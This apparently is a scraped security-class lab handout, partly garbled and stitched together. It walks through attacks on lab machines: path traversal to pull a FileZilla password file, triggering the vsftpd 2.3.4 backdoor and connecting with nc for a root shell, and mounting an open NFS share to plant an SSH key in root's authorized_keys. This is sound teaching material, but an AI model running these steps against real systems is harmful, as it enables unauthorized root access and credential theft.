Professional Documents
Culture Documents
• Kali
• Metasploitable
• Win2008-124
On the Win2008-124 machine, open a new Command Prompt and execute the IPCONFIG
command. Find its IP address.
On some other computer, such as your host machine, open a Web browser and enter the IP
address of your Win2008-124 machine, followed by :3232
?../../../../
A directory appears, as shown below.
This the root of C:, which contains objects like Boot, config.sys, and "Documents and Settings".
xampp/FileZillaFTP/FileZilla%20Server.xml
When you open that URL, a file downloads. The file is named "changelog.txt" but it actually
contains the FileZilla configuration file.
Open that file in a text editor. It contains passwords hashed with MD5, as shown below.
Capturing a Screen Image
Starting Metasploitable
Starting Kali
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
nmap -A -p20-21 172.16.1.190
Nmap finds vsftpd 2.3.4, as shown below.
Understanding the Backdoor Googling vsftpd 2.3.4 quickly shows articled explaining the
backdoor, as shown below.
Installing FTP
apt-get update
apt install ftp -y
FTP installs, as shown below.
Connecting with FTP
On Kali, in a Terminal window, execute this command, replacing the IP address with the IP
address of your Metasploitable machine.
ftp 172.16.1.190
Enter a username of
aa:)
and type anything for the passwprd.
Open a new Terminal window and execute this command, replacing the IP address with the IP
address of your Metasploitable machine.
nc 172.16.1.190 6200
There is no prompt, but you have a shell. To see that, execute these commands:
whoami
uname -a
You're root on metasploitable, as shown below.
Capturing a Screen Image
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
nmap -A 172.16.1.190
Nmap produces several screens of output.
Find the results for port 111. It detected nfs, as shown below.
Troubleshooting
Nmap 7.70 is broken and cannot run the nfs scan. Nmap 7.60 works. If your version can't
find the NFS share, just skip to the next section "Enumerating NFS".
Enumerating NFS
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with
the IP address of your Metasploitable machine.
These commands install some software needed to use nfs shares, and mount the shared folder
on your Kali system in the /tmp folder.
apt-get update
apt-get install nfs-common -y
mkdir /tmp/mount
mount -t nfs 172.16.1.190:/ /tmp/mount -o nolock
cd /tmp/mount
ls
You see all the folders expected at the root of a Linux system, as shown below.
From your Kali machine, in a Terminal, execute these commands to find the SSH keys for the
"msfadmin" user.
cd home
cd msfadmin
ls -al
cd .ssh
ls -l
Three files are found, as shown below.
• authorized_keys
• id_rsa
• id_rsa.pub
Let's look at these files.
ls
cat authorized_keys
The authorized_keys file contains public keys of authorized users, as shown below.
Generating SSH Keys
To exploit the Metasploitable box, we'll add our public SSH key to the authorized_keys file. So
first we need to generate keys.
ssh-keygen
The keys are generated and placed in the /root/.ssh directory, as shown below.
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
ssh msfadmin@172.16.1.190
You get a shell as the "msfadmin" user, as shown below.
To get root access, all you need to do is add that public key to the root user's authorized_keys
file.
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with
the IP address of your Metasploitable machine.
cd /tmp/mount/root/.ssh
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
ssh root@172.16.1.190
whoami
Your get a root shell, as shown below.
root@metasploitable:~# whoami
root
Capture a whole-desktop image and save it as "Proj 11c from YOURNAME".